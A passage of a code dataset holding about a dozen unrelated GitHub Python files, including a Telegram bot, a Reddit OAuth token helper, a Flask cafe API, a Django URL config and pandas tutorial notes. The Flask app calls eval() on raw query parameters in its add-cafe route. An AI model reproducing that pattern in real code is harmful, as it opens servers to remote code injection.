catalogueList\nfrom utils.validateYear import validateYear\nfrom constants import CONFIRM_BUTTON_CALLBACK_QUERY_TYPE, \\\n CONFIRM_BUTTON_CALLBACK_BRAND_DATA, CONFIRM_BUTTON_CALLBACK_PRICE_DATA\nfrom utils.fetch import fetch\n\n# confirm button filters\nnoConfirmButton = lambda callback: not CONFIRM_BUTTON_CALLBACK_QUERY_TYPE in callback.data\nisConfirmButton = lambda callback: CONFIRM_BUTTON_CALLBACK_QUERY_TYPE in callback.data\n\n@dp.callback_query_handler(noConfirmButton, state = FormState.withBrands)\nasync def selectBrand(callback: CallbackQuery, state: FSMContext):\n currentState = await state.get_data()\n updatedList = updateStateDataList(currentState['brands'], callback.data)\n await state.update_data(brands = updatedList)\n\n return updatedList, CONFIRM_BUTTON_CALLBACK_BRAND_DATA\n\n@dp.callback_query_handler(isConfirmButton, state = 
FormState.withBrands)\nasync def confirmBrand(callback: CallbackQuery, state: FSMContext):\n await FormState.withYears.set()\n await callback.bot.send_message(\n text = 'Введiть дату першoї реєстрацiї авто🚐.\\nНаприклад, точну 2007 або перiод 2001-2009.',\n chat_id = callback.message.chat.id,\n parse_mode = ParseMode.HTML\n )\n\n return None # cancel post middleware\n\n@dp.message_handler(state = FormState.withYears)\nasync def selectYears(message: Message, state: FSMContext):\n messageText = message.text\n validateResult = validateYear(messageText)\n\n if bool(validateResult):\n await state.update_data(years = validateResult)\n await FormState.withPrice.set()\n priceList: list = fetch('api/params/price')\n\n mapedPriceList = list(map(lambda price: FormItem(price), priceList))\n\n await state.update_data(price = mapedPriceList)\n await message.answer(\n 'Оберiть цiновий дiапазон (в долларах США)💵',\n reply_markup = catalogueList(mapedPriceList, CONFIRM_BUTTON_CALLBACK_PRICE_DATA),\n parse_mode = ParseMode.HTML\n )\n else:\n await message.answer(\n text ='Здається, що Ви ввели невiрну дату🤕.\\nКорректний формат має бути точний рiк (наприклад, 2007) або перiод (2001-2007)🧐',\n parse_mode = ParseMode.HTML\n )\n\n@dp.callback_query_handler(noConfirmButton, state = FormState.withPrice)\nasync def selectPrice(callback: CallbackQuery, state: FSMContext):\n currentState = await state.get_data()\n updatedList = updateStateDataList(currentState['price'], callback.data)\n await state.update_data(price = updatedList)\n\n return updatedList, CONFIRM_BUTTON_CALLBACK_PRICE_DATA\n\n@dp.callback_query_handler(isConfirmButton, state = FormState.withPrice)\nasync def confirmPrice(callback: CallbackQuery, state: FSMContext):\n await FormState.withPrice.set()\n await callback.bot.send_message(\n text = 'ПОКА ШО ВСЁ..',\n chat_id = callback.message.chat.id,\n parse_mode = ParseMode.HTML\n )\n\n return None # cancel post middleware\n","repo_name":"bringmetheaugust/Challenger","sub_path":"telegram_bot/src/handlers/updateForm.py","file_name":"updateForm.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"649330121","text":"import re\nfrom bs4 import BeautifulSoup\nfrom collections import defaultdict, deque, OrderedDict\nimport os\n\n\n\"\"\"\n start: Stone_Age\n end: Python_(programming_language)\n chain: start -> Brain -> Artificial_intelligence -> end\n \n FIND:
\n    - The number of images (img) with width at least 200.\n    - The number of headings whose text starts with E, T or C. For example: <h1>End</h1> or <h2>Contents</h2>\n    \n    - The length of the longest sequence of links with no other tags, opening or closing, between them.\n      For example: <a>..</a>, <a>..</a>, </span> <a>..</a> - here there are 2 links in a row, because the closing\n      span breaks the sequence. <a>..<span>..</span></a>, <a>..</a>, <a>..</a> - and here there are 3 links in a row,\n      because the span sits inside a link rather than between links.\n    \n    - The number of lists (ul, ol) not nested inside other lists. For example: <ol>..</ol>, <ul>..<ul>..</ul>..</ul>\n      - two non-nested lists (and one nested)\n    \n    path: /Users/macair/Python Projects/CourseraP3/wiki\n    \n    result:\n    return {\n        'Stone_Age': [13, 10, 12, 40],\n        'Brain': [19, 5, 25, 11],\n        'Artificial_intelligence': [8, 19, 13, 198],\n        'Python_(programming_language)': [2, 5, 17, 41]\n    } \n\"\"\"\n\n\ndef bfs(start, end, tree):\n    visited, queue = defaultdict(list), deque([start])\n    visited[start]\n    while queue:\n        vertex = queue.popleft()\n        for neighbour in tree.get(vertex, set()):\n            if neighbour == end:\n                visited[neighbour].append(vertex)\n                queue.clear()\n                break\n\n            elif neighbour not in visited:\n                visited[neighbour].append(vertex)\n                queue.append(neighbour)\n\n    if len(tree) == len(visited):\n        return visited\n    return bfs(end, start, visited)\n\n\ndef build_tree(start, end, path):\n    link_re = re.compile(r\"(?<=/wiki/)[\\w()]+\")\n    files = OrderedDict.fromkeys(os.listdir(path))\n    for file in files.keys():\n        with open(os.path.join(path, file), \"r\") as f:\n            files[file] = set(link_re.findall(f.read()))\n    return bfs(start, end, files)\n\n\ndef build_bridge(start, end, path):\n    return build_tree(start, end, path).keys()\n\n\ndef parse(start, end, path):\n\n    def find_link_chain(soup, name):\n        \"\"\"\n        :param soup:\n        :return: max_chain[0]\n            max chain of links with tag <a>\n        \"\"\"\n        li = soup.find(name)\n        chain = [li, ] if li else []\n        max_chain = []\n        while li:\n            nli = li.findNextSibling()\n            if nli:\n                li = nli\n                if nli.name == name:\n                    chain.append(li)\n                else:\n                    if len(max_chain) > 1:\n                        max_chain = [max(max_chain, key=len), ]\n\n                    max_chain.append(chain)\n                    chain = []\n            else:\n                li = li.find_next(name)\n                max_chain.append(chain)\n                chain = [li, ]\n\n        return max_chain[0]\n\n    bridge = build_bridge(start, end, path)\n    results = OrderedDict.fromkeys(bridge)\n\n    for file in bridge:\n        with open(os.path.join(path, file), \"r\") as data:\n            soup = BeautifulSoup(data, \"html.parser\")\n            body = soup.find(id=\"bodyContent\")\n\n            imgs = len(body.find_all(\"img\", width=lambda x: int(x or 0) >= 200))\n            headers = len(re.findall(r\"<h\\d.*?>([CET].+?)<\\/h\\d>\", str(body)))\n            links = len(find_link_chain(body, name=\"a\"))\n            lists = len([tag for tag in body.find_all([\"ul\", \"ol\"]) if not tag.find_parents([\"ul\", \"ol\"])])\n\n            results[file] = [imgs, headers, links, lists]\n\n    return results\n","repo_name":"heorhii-bolotov/Python-Projects","sub_path":"CourseraP3/W2T1.py","file_name":"W2T1.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23999154132","text":"#!/usr/bin/env python\n\n\"\"\"This example demonstrates the flow for retrieving a refresh token.\n\nIn order for this example to work your application's redirect URI must be set\nto http://localhost:8080.\n\nThis tool can be used to conveniently create refresh tokens for later use with\nyour web application OAuth2 credentials.\n\n\"\"\"\nimport logging\nimport random\nimport socket\nimport sys\nimport conf\nimport webbrowser\nimport praw\n\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.DEBUG)\nlogger = logging.getLogger('retroreddit-creator')\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(handler)\n\n\ndef receive_connection():\n    \"\"\"Wait for and then return a connected socket.\n\n    Opens a TCP connection on port 8080, and waits for a single client.\n\n    \"\"\"\n    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    server.bind(('localhost', 8080))\n    server.listen(1)\n    client = 
server.accept()[0]\n server.close()\n return client\n\n\ndef send_message(client, message):\n \"\"\"Send message to client and close the connection.\"\"\"\n print(message)\n client.send('HTTP/1.1 200 OK\\r\\n\\r\\n{}'.format(message).encode('utf-8'))\n client.close()\n\n\ndef request_login(reddit):\n \"\"\"Provide the program's entry point when directly executed.\"\"\"\n scopes = ['edit', 'history', 'identity',\n 'mysubreddits', 'privatemessages', 'read', 'report',\n 'save', 'submit', 'subscribe', 'vote']\n # scopes = ['creddits', 'edit', 'flair', 'history', 'identity',\n # 'modconfig', 'modcontributors', 'modflair', 'modlog',\n # 'modothers', 'modposts', 'modself', 'modwiki',\n # 'mysubreddits', 'privatemessages', 'read', 'report',\n # 'save', 'submit', 'subscribe', 'vote', 'wikiedit',\n # 'wikiread']\n\n state = str(random.randint(0, 65000))\n url = reddit.auth.url(scopes, state, 'permanent')\n webbrowser.open(url)\n sys.stdout.flush()\n\n client = receive_connection()\n data = client.recv(1024).decode('utf-8')\n param_tokens = data.split(' ', 2)[1].split('?', 1)[1].split('&')\n params = {key: value for (key, value) in [token.split('=')\n for token in param_tokens]}\n\n if state != params['state']:\n send_message(client, 'State mismatch. Expected: {} Received: {}'\n .format(state, params['state']))\n return None\n elif 'error' in params:\n send_message(client, params['error'])\n return None\n\n refresh_token = reddit.auth.authorize(params['code'])\n send_message(client, 'Refresh token: {}; please close this window'.format(refresh_token))\n return refresh_token\n\n\ndef create_reddit(refresh_token=None):\n if isinstance(refresh_token, str) and refresh_token:\n reddit = praw.Reddit(client_id=conf.clientId,\n client_secret=conf.clientSecret,\n user_agent=conf.userAgent,\n redirect_uri='http://localhost:8080',\n refresh_token=refresh_token)\n reddit.config.decode_html_entities = False\n reddit.read_only = False\n return reddit\n reddit = praw.Reddit(client_id=conf.clientId,\n client_secret=conf.clientSecret,\n redirect_uri='http://localhost:8080',\n user_agent=conf.userAgent)\n reddit.config.decode_html_entities = False\n return reddit\n\n\ndef init_reddit():\n try:\n with open(\"retro_reddit.txt\", \"r+\") as token_file:\n token = token_file.readline()\n logger.debug(\"Init with token {}\".format(token))\n if token:\n return create_reddit(token)\n except FileNotFoundError:\n pass\n return create_reddit()\n\n\ndef save_token(refresh_token):\n with open(\"retro_reddit.txt\", \"w+\") as token_file:\n token_file.write(refresh_token)\n token_file.flush()\n\n\ndef login(reddit, refresh_token=None):\n if isinstance(refresh_token, str) and refresh_token:\n logger.debug(\"Found token {}\".format(refresh_token))\n save_token(refresh_token)\n return create_reddit(refresh_token)\n logger.debug(\"Launching login request\")\n token = request_login(reddit)\n if token is not None:\n save_token(token)\n return create_reddit(token)\n return reddit\n\n","repo_name":"McHacks-2018/Retro-Reddit","sub_path":"reddit_creator.py","file_name":"reddit_creator.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2582928954","text":"# Given a non-empty array of integers nums, every element appears twice except for one. 
Find that single one.\n# You must implement a solution with a linear runtime complexity and use only constant extra space.\n\nnums = [2,2,1,5,1]\n\n\ndef singleNumber(nums):\n singleNum = None\n length = len(nums) # get length\n i = 0\n while i < length: # while i is in range\n if nums.count(nums[i]) == 1: # if the number is only found once\n singleNum = nums[i] # assign single value to variable\n break #leave loop\n i += 1\n return singleNum # return single value\n\n \nprint(singleNumber(nums))\n\n","repo_name":"E-Justin/exercises-","sub_path":"findSingleValue.py","file_name":"findSingleValue.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1850027756","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom random import randint\n\napp = Flask(__name__)\n\n##Connect to Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///cafes.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\n##Cafe TABLE Configuration\nclass Cafe(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n def list_cafes(self):\n return {column.name: getattr(self, column.name) for column in self.__table__.columns}\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route(\"/random\", methods=[\"GET\"])\ndef get_random_cafe():\n with app.app_context():\n no_of_rows = db.session.query(Cafe).count()\n random_id = randint(1, no_of_rows + 1)\n random_cafe = db.session.query(Cafe).filter(Cafe.id == random_id).scalar()\n output = {\"cafe\": {\n \"can_take_calls\": random_cafe.can_take_calls,\n \"coffee_price\": random_cafe.coffee_price,\n \"has_socket\": random_cafe.has_sockets,\n \"has_toilet\": random_cafe.has_toilet,\n \"has_wifi\": random_cafe.has_wifi,\n \"id\": random_cafe.id,\n \"img_url\": random_cafe.img_url,\n \"location\": random_cafe.location,\n \"map_url\": random_cafe.map_url,\n \"name\": random_cafe.name,\n \"seats\": random_cafe.seats\n }}\n return jsonify(output)\n\n\n@app.route(\"/all\", methods=[\"GET\"])\ndef get_all_cafes():\n cafe_list = []\n with app.app_context():\n all_cafes = db.session.query(Cafe).all()\n for cafe in all_cafes:\n cafe_list.append(cafe.list_cafes())\n output = {\"cafes\": cafe_list}\n return jsonify(output)\n\n\n@app.route(\"/search\", methods=[\"GET\"])\ndef get_caffe_by_loc():\n cafe_list = []\n area = request.args.get(\"loc\")\n with app.app_context():\n area_caffe = db.session.query(Cafe).filter(Cafe.location == area).all()\n if len(area_caffe) == 0:\n output = {\n \"error\": {\n \"Not Found\": f\"Sorry, we don´t have cafe at {area} location.\"\n }\n }\n else:\n for cafe in area_caffe:\n cafe_list.append(cafe.list_cafes())\n output = {\"cafes\": cafe_list}\n return jsonify(output)\n\n\n@app.route(\"/add\", methods=[\"GET\"])\ndef add_cafe():\n name = request.args.get(\"name\")\n map_url = 
request.args.get(\"map_url\")\n img_url = request.args.get(\"img_url\")\n location = request.args.get(\"location\")\n seats = request.args.get(\"seats\")\n has_toilet = request.args.get(\"has_toilet\")\n has_wifi = request.args.get(\"has_wifi\")\n has_sockets = request.args.get(\"has_sockets\")\n can_take_calls = request.args.get(\"can_take_calls\")\n coffee_price = request.args.get(\"coffee_price\")\n\n new_cafe = Cafe(\n name=name,\n map_url=map_url,\n img_url=img_url,\n location=location,\n seats=seats,\n has_toilet=eval(has_toilet),\n has_wifi=eval(has_wifi),\n has_sockets=eval(has_sockets),\n can_take_calls=eval(can_take_calls),\n coffee_price=coffee_price\n )\n with app.app_context():\n db.session.add(new_cafe)\n db.session.commit()\n\n response = {\n \"response\": {\n \"success\": \"Succesfully added the new cafe.\"\n }\n }\n return jsonify(response)\n\n\n## HTTP GET - Read Record\n\n## HTTP POST - Create Record\n\n## HTTP PUT/PATCH - Update Record\n\n## HTTP DELETE - Delete Record\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"womaro/day-66-api-with-RESTful-routing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33399730415","text":"def solution(board, moves):\n answer = 0\n\n basket = list()\n\n for m in moves:\n\n for idx in range(len(board)):\n\n if board[idx][m - 1] > 0:\n basket.append(board[idx][m - 1])\n board[idx][m - 1] = 0\n\n if basket[-1:] == basket[-2:-1]:\n answer += 2\n basket = basket[:-2]\n break\n return answer\n\nprint(solution([[0,0,0,0,0],[1,1,1,1,1],[2,2,2,2,2],[3,3,4,3,3],[3,5,1,3,1]],[1,5,3,5,1,2,1,4]))\n\n'''\n배열에 초기값이 있을지 없을지 모르는 상황에서 list[-2] 처럼 확실한 index를 지정하지말고,\nlist[-2:-1] 처럼 범위로 지정하면, 값이 없을때는 빈 배열로 나오게된다.\n이것으로 index out of range 오류를 피해갈수있음\n\n'''","repo_name":"steampower33/Algorithm_Solve","sub_path":"python_solve/Lv1/크레인 인형뽑기 게임.py","file_name":"크레인 인형뽑기 게임.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37885870375","text":"\"\"\"fighter URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf.urls import url\nfrom rest_framework import routers\nfrom contest.views import (\n general_views,\n entry_views,\n event_views,\n user_views,\n chat_views,\n social_views,\n game_views,\n faq_views\n)\nfrom rest_framework_extensions.routers import ExtendedSimpleRouter\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\n\nrouter = ExtendedSimpleRouter()\nevent_router = router.register(r'events', event_views.EventViewSet)\nevent_router.register(\n r'bouts',\n general_views.BoutViewSet,\n basename='events-bout',\n parents_query_lookups=['event']\n )\n\nrouter.register(r'^fighters', general_views.FighterViewSet)\nrouter.register(r'^entries', entry_views.EntryViewSet)\nrouter.register(r'^games', game_views.GameViewSet)\nrouter.register(r'^users', user_views.UserViewSet)\nrouter.register(r'^groups', general_views.GroupViewSet)\nrouter.register(r'^faqs', faq_views.FaqViewSet)\n\n# chat\nrouter.register(r'^chat/rooms', chat_views.ChatRoomViewSet)\nrouter.register(r'^chat/rooms/(?P\\d+)$', chat_views.ChatRoomViewSet)\nrouter.register(r'^chat/files', chat_views.ChatFileViewSet)\nrouter.register(r'^chat/messages', chat_views.ChatMessageViewSet)\nrouter.register(r'^chat/messages/(?P\\d+)$', chat_views.ChatMessageViewSet)\n\n# customize admin\n# class CustomAdminSite(admin.AdminSite):\n \n# def get_urls(self):\n# urls = super(CustomAdminSite, self).get_urls()\n# custom_urls = [\n# url(r'desired/path$', self.admin_view(organization_admin.preview), name=\"preview\"),\n# ]\n# return urls + custom_urls\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include(router.urls)),\n url(r'^auth/', include('rest_auth.urls')),\n url(r'^auth/registration/', include('rest_auth.registration.urls')),\n url(r'^auth/twitter/$', social_views.TwitterLogin.as_view(), name='twitter_login'),\n url(r'^auth/twitter/request_token/$', social_views.TwitterAuthRedirectEndpoint.as_view()),\n url(r'^auth/twitter/callback/$', social_views.TwitterCallbackEndpoint.as_view()),\n url(r'^auth/twitter/webhook/$', social_views.TwitterWebhookEndpoint.as_view()),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n]\n","repo_name":"aalacy/mma-website","sub_path":"fighter/fighter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26977651315","text":"from mrjob.job import MRJob\r\nfrom mrjob.step import MRStep\r\n\r\nclass MRMostUsedWord(MRJob):\r\n\r\n def steps(self):\r\n return [\r\n MRStep(mapper=self.mapper_get_friends,\r\n reducer=self.reducer_count_friends),\r\n MRStep(mapper=self.mapper_socialrank,\r\n reducer=self.reducer_socialrank)\r\n ]\r\n\r\n def mapper_get_friends(self, _, line):\r\n words = line.split()\r\n yield (words[0], words[1])\r\n\r\n def reducer_count_friends(self, id, friends):\r\n frnd = []\r\n for x in friends:\r\n frnd.append(x)\r\n yield (id, (frnd, 1))\r\n\r\n def mapper_socialrank(self, key, friends):\r\n rank = float(friends[1])/float(len(friends[0]))\r\n for x in friends[0]:\r\n yield (x, ([], rank))\r\n yield (key, (friends[0], 0))\r\n\r\n\r\n def reducer_socialrank(self, key, friends):\r\n total = 0\r\n frnd = []\r\n for x in friends:\r\n total += x[1]\r\n frnd = x[0] + frnd\r\n total 
= 0.15 + 0.85*total\r\n yield (key, (frnd, total))\r\n\r\n\r\nif __name__ == '__main__':\r\n MRMostUsedWord.run()","repo_name":"mobeent/Social-Rank-Algorithm-Using-Map-Reduce","sub_path":"mr_word_count.py","file_name":"mr_word_count.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42496454929","text":"#!/usr/bin/python3\n\"\"\"Creating a class square.\n self: reference the name of the object of instance 'Square'.\n\"\"\"\n\n\nclass Square:\n \"\"\"defining Class square body.\"\"\"\n def __init__(self, __size=0):\n \"\"\"\n Args:\n __size: unaccessible/private field of the init method\n \"\"\"\n if (isinstance(__size, int)):\n if (__size < 0):\n raise ValueError(\"size must be >= 0\")\n self.__size = __size\n else:\n raise TypeError(\"size must be an integer\")\n\n def area(self):\n \"\"\"\n function area is a public method of class \\\n Square that compute the area of the square.\n \"\"\"\n\n return (self.__size * self. __size)\n","repo_name":"Abdulgithub0/alx-higher_level_programming","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40725036129","text":"from datetime import date, timedelta\n\ndef meetup_day(year, month, day, descriptor):\n \n day_of_week = {'Monday': 0, 'Tuesday': 1, 'Wednesday': 2,\n 'Thursday': 3, 'Friday': 4, 'Saturday': 5, 'Sunday': 6}\n\n # Begin with the first day of the month.\n meetup_date = date(year, month, 1)\n\n # Find the first instance of the weekday.\n while meetup_date.weekday() is not day_of_week[day]:\n meetup_date += timedelta(1) # Increment by one day.\n\n if descriptor == '1st':\n return meetup_date\n elif descriptor == '2nd':\n # Increment by a week.\n return meetup_date + timedelta(7)\n elif descriptor == '3rd':\n # Increment by two weeks.\n return meetup_date + timedelta(14)\n elif descriptor == '4th':\n # Increment by three weeks.\n return meetup_date + timedelta(21)\n elif descriptor == 'teenth':\n # Increment by a week until the day is between the 13th and 19th of the month.\n while meetup_date.day < 13:\n meetup_date += timedelta(7)\n return meetup_date\n elif descriptor == 'last':\n # Increment by a week until reaching a new month.\n while meetup_date.month == month:\n meetup_date += timedelta(7)\n return meetup_date - timedelta(7)\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/meetup/51fafb4ed0e54913b19bf0b9ed8bc36d.py","file_name":"51fafb4ed0e54913b19bf0b9ed8bc36d.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"22340026691","text":"from yahooquery import Ticker\r\nimport numpy as np\r\nimport pandas as pd\r\nimport time\r\n\r\npaper = input(\"Type stock code, please: \")\r\nprint(paper)\r\n\r\ntime = time.asctime()\r\nprint(time)\r\n\r\npaper = Ticker(paper)\r\npaper = paper.history(period='7d', interval = \"1m\")\r\n\r\npaper = pd.DataFrame(paper)\r\npaper = paper.tail(100) \r\nhundredLastClosePrice = paper[\"close\"].tolist()\r\n#print(hundredLastClosePrice)\r\naverage = np.average(hundredLastClosePrice)\r\n\r\n\r\n\r\nprint(\"average: \" + 
str(average))\r\n\r\n\r\n\r\n#data.to_excel(\"STBP3.xlsx\")\r\n\r\n","repo_name":"rogerfidelis/Job-Tools","sub_path":"averageCotation.py","file_name":"averageCotation.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74323700697","text":"# -*- coding: utf-8 -*-\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\n\nfrom config import Config\nfrom util import *\nfrom myio import *\n\n\ncategory_frames = read(Config.get(\"feature.extraction.output.path\"), 250)\ntrain_frame, test_frame = split_train_test(category_frames, test_size=0.1)\nmask = np.asarray(np.ones((1, train_frame.shape[1]), dtype=bool))[0]\nmask[0] = False\ntrain_matrix, test_matrix = dataframe_to_numpy_matrix(train_frame, test_frame, mask)\ntrain_x, train_y = split_target_from_data(train_matrix)\ntest_x, test_y = split_target_from_data(test_matrix)\nattachment_a_frames = read(Config.get(\"attachmentA.feature.extraction.output.path\"), 150)\nattachment_a_frame = concat(attachment_a_frames)\nattachment_a_matrix = dataframe_to_numpy_matrix_single(attachment_a_frame, mask)\nattachment_a_x, attachment_a_y = split_target_from_data(attachment_a_matrix)\n\nscaler = StandardScaler()\ntrain_x = scaler.fit_transform(train_x)\ntest_x = scaler.transform(test_x)\nattachment_a_x = scaler.transform(attachment_a_x)\n\npca = PCA(n_components=300)\ntrain_x = pca.fit_transform(train_x)\ntest_x = pca.transform(test_x)\nattachment_a_x = pca.transform(attachment_a_x)\n\n'''\nclf = OneVsRestClassifier(LogisticRegression(random_state=42))\nparams = {\n 'estimator__C': np.logspace(-3, 3, 7),\n}\nclf = util.fit_cv(clf, train_x, train_y, params)\nprint(\"Best parameters are %s with a score of %0.2f\" % (clf.best_params_, clf.best_score_))\n'''\n\nclf = OneVsRestClassifier(LogisticRegression(verbose=0, random_state=42, C=1000))\nclf.fit(train_x, train_y)\nprint(\"Confusion matrix on training data\")\ntest(clf, train_x, train_y)\nprint(\"Confusion matrix on test data\")\ntest(clf, test_x, test_y)\nprint(\"Confusion matrix on attachment a\")\ntest(clf, attachment_a_x, attachment_a_y)\n\nplot_learning_curve(clf, \"Logistic Regression\", train_x, train_y)\nplt.savefig(\"lc_logreg.png\")\nplt.show()\n","repo_name":"FelixNeutatz/GitHubRepositoryClassifier","sub_path":"model/ml/runLogisticRegression.py","file_name":"runLogisticRegression.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"6561396032","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n dummy1 = ListNode()\n dummy2 = ListNode()\n partitionOne = dummy1\n partitionTwo = dummy2\n currOne = partitionOne\n currTwo = partitionTwo\n while head:\n if head.val < x:\n currOne.next = head\n currOne = currOne.next\n else:\n currTwo.next = head\n currTwo = currTwo.next\n head = head.next\n currTwo.next = None\n currOne.next = partitionTwo.next\n return partitionOne.next\n 
","repo_name":"yosefalemu/Competitive-Programming","sub_path":"0086-partition-list/0086-partition-list.py","file_name":"0086-partition-list.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29095359199","text":"# DataFrame: Think of a data frame as a sequence of series (where each series is arranged vertically). So it looks like a excel spreadsheet or 2 dimensional data.\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\n\n# from simple ndarray (numpy array)\ndata=np.random.randn(3,4)\ndf=DataFrame(data, columns=list('ABCD'))\nprint ('df from ndarray \\n%s\\n' % df)\n\n# creating DataFrame from dict of Series or dict of dicts.\n# dictionary keys are column headings (so 'a' and 'b' are columns headings), the nested dictionary is converted to\n# series with data as 'a' and 'b' and index as 0 and 1. Very trivial\nd = {'a': pd.Series(np.random.randn(5)), 'b': { 0: 'a', 1: 'b'}}\ndf = DataFrame(d)\nprint ('df from dict of series/dict \\n%s\\n' % df)\n# if you want 'a' and 'b' (dict keys) to become row index instead. use DataFrame.from_dict() function with the orient parameter\ndf = DataFrame.from_dict(d, orient='index') # 'a' and 'b' will be row labels. columns will be 0, 1, 2, 3, 4\nprint('df from DataFrame.from_dict(orient=index) \\n%s\\n' % df)\n\n# from dict of lists\nd = {'one': [1., 2., 3., 4.], 'two': [4, 3, 2, 1]} # columns are 'one' and 'two'\ndf = DataFrame(d, index=['a', 'b', 'c', 'd'])\nprint('df from dict of lists (almost same as above) \\n%s\\n' % df)\n\n# from list of dicts\nd = [{'a': 1, 'b': 20}, {'a': 1., 'b': 2., 'c': 20.}] # columns will be 'a', 'b', 'c'\ndf = DataFrame(d)\nprint('df from list of dict \\n%s\\n' % df)\n\n# from structure. When your data is in a structured format, like a tuple of values making a row, then you use this ctor\n# 'A', 'B', 'C' are column names, i4, f8 and ? are type codes defined in numpy. i4 means 4 byte integer, f8 is 8 byte float, ? means bool. argument to np.zeros is as many structures you want to define. 
ie as many rows.\ndata = np.zeros((2,), dtype=[('A', 'i4'), ('B', 'f8'), ('C', '?')])\nprint('raw data for structure \\n%s\\n' % data)\ndata[:] = [(1, 3., False), (10, 9.3466, True)] #data[:] gives a view of the whole data, if we just said data = \n# we would have lost the data type information for every column.\ndf = DataFrame(data)\nprint('df from structure \\n%s\\n' % df)\n\n# let say in the above example, you want to create an index from one of the columns (let say column C (bool)), then you can do that using the from_records ctor\ndata = np.array([(1, 3., False), (10, 9.3466, True)], dtype=[('A', 'i4'), ('B', 'f8'), ('C', '?')])\ndf=DataFrame.from_records(data, index='C')\nprint('df from pd.DataFrame.from_records \\n%s\\n' % df)\n\n\n\n# DataFrame also supports multi indexed (multi columns, multi rows)\n# from dict of tuples\ndata = {('a', 'a'): {('A', 'B'): 1, ('A', 'C'): 6, ('A', 'A'): np.nan, ('D', 'D'): -1},\n ('a', 'b'): {('A', 'B'): 2, ('A', 'C'): 7, ('D', 'D'): -2},\n ('a', 'c'): {('A', 'B'): 3, ('A', 'C'): 8},\n ('b', 'a'): {('A', 'B'): 4, ('A', 'C'): 9},\n ('b', 'b'): {('A', 'B'): 5, ('D', 'D'): -5}}\ndf=DataFrame(data)\nprint('df (multi index) from dict of tuples \\n%s\\n' % df)\n\n# from DataFrame.from_items(arg) used when arg is a list of two tuple (x, y): x is column name(or row name if orient='index') and y is a list of column (or row) values\ndf=DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 